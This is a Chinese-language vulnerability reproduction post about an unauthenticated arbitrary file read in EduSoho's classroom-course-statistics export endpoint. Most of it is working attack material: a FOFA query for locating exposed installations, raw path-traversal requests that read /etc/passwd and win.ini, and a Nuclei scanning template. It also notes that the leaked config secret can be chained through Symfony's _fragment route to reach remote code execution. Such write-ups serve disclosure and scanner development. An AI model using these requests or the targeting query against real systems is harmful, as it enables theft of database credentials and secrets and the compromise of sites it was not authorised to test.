【漏洞复现】EduSoho教培系统任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统，基于EduSoho教育云PaaS平台的底层技术打造，专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案，专注人才培养、专注组织建设，帮助企业构建学习型组织，促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞，通过该漏洞攻击者可以读取到config/parameters.yml文件的内容，拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后，攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法：

title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")

【产品界面】

【漏洞复现】

【poc】

linux系统：

GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

windows系统：

GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
Host: 127.0.0.1

【Nuclei-Poc】

id: EduSoho_arbitrary_file_read_crossplatform
info:
name: EduSoho Cross-Platform Directory Traversal Vulnerability
author: yourname
severity: critical
description:
tags: directory-traversal,cve,critical
requests:
- method: GET
path:
- "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
- "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
- "[extensions]" # Windows systems
condition: or
- type: status
status:
- 200
- type: word
part: body
negative: true
words:
- "empty file"
condition: and
- type: word
part: body
negative: true
words:
- "\"success\": 0"
condition: and